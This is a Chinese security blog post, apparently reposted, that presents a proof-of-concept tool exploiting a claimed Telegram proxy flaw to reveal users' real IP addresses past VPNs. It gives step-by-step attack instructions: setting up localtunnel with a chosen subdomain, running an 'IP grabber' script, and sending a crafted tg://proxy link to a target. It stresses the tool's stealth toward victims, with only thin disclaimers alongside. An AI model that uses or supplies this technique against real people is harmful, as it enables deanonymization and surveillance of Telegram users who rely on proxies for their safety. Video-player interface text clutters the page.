文章总结: Telegram客户端在点击tg://proxy链接时会先跳过代理直接连接指定服务器,导致真实IP被暴露。文章给出完整POC:本地起伪造MTProxy、用localtunnel打洞、生成恶意链接发受害者,点击后记录其真实地址,支持跨平台且无需依赖。作者强调仅限授权测试。 综合评分: 78 文章分类: 漏洞POC,红队,渗透测试,WEB安全
Telegram 一键暴露用户真实 IP 地址
原创
暗影安全
暗影安全
2026年1月13日 13:25 北京
针对 Telegram 代理验证漏洞的概念验证攻击,该漏洞会泄露用户的真实 IP 地址,绕过 VPN 和代理设置。
仅供教育和安全研究用途。 此工具演示了 Telegram 代理验证系统中的安全漏洞。请仅在您拥有或已获得明确测试许可的系统上使用。作者对任何滥用行为概不负责。
📌 漏洞描述
CVE:非官方(代理重置 IP 泄露) 受影响: Telegram 安卓和 iOS 版 影响:绕过 VPN/代理,真实 IP 地址暴露
当 Telegram 用户点击链接时,客户端会在应用任何已配置的代理设置之前,tg://proxy尝试连接到指定的代理服务器。此连接源自设备的真实网络接口,会暴露设备的公网 IP 地址。
🚀 快速入门
1. 演示
#
已关注
关注
重播 分享 赞
关闭
观看更多
更多
退出全屏
切换到竖屏全屏退出全屏
暗影安全已关注
分享视频
,时长00:10
0/0
00:00/00:10
切换到横屏模式
继续播放
[ ]
进度条,百分之0
播放
00:00
/
00:10
00:10
倍速
全屏
倍速播放中
0.5倍 0.75倍 1.0倍 1.5倍 2.0倍
超清 流畅
继续观看
Telegram 一键暴露用户真实 IP 地址
观看更多
转载
,
Telegram 一键暴露用户真实 IP 地址
暗影安全已关注
分享点赞在看
已同步到看一看写下你的评论
视频详情
#
2. 隧道入口(必需)
#Install localtunnel (Node.js required)npm install -g localtunnel#Start tunnel (in separate terminal)lt --port 9090 --subdomain yourcustomname
3. 运行 IP 抓取器
python main.py
5. 发送漏洞利用链接
复制生成的链接并将其发送给目标 Telegram 用户:
tg://proxy?server=ip&port=443&secret=ee
🔧 工作原理
- 服务器设置:创建一个监听指定端口的虚拟 MTProxy 服务器
- 创建隧道:建立到本地服务器的公共隧道 (loca.lt/ngrok)
- 有效载荷生成:创建
tg://proxy包含隧道 URL 的 Telegram 链接 - 受害者互动:目标点击 Telegram 中的链接
- IP地址捕获: Telegram直接连接(绕过VPN),暴露真实IP地址
- 数据记录:实时显示捕获到的 IP 地址
🎯 功能
- ✅真实 IP 地址提取– 绕过 VPN 和代理设置
- ✅支持多种隧道– 可与 loca.lt、ngrok、Cloudflare 等配合使用。
- ✅隐蔽行动– 受害者只会看到“正在测试代理连接”的提示
- ✅跨平台– 可在 Windows、Linux 和 macOS 上运行
- ✅无依赖项– 纯 Python 编写,无需外部库
- ✅详细日志记录– 连接数据和握手分析
方案分析
该漏洞利用了 Telegram 的 MTProxy 协议:
- 握手:
0xef 0xef 0xef 0xef前缀 - 响应:60字节握手确认
- 加密:简单的基于密钥的身份验证
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:暗影安全 暗影安全《Telegram 一键暴露用户真实 IP 地址》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论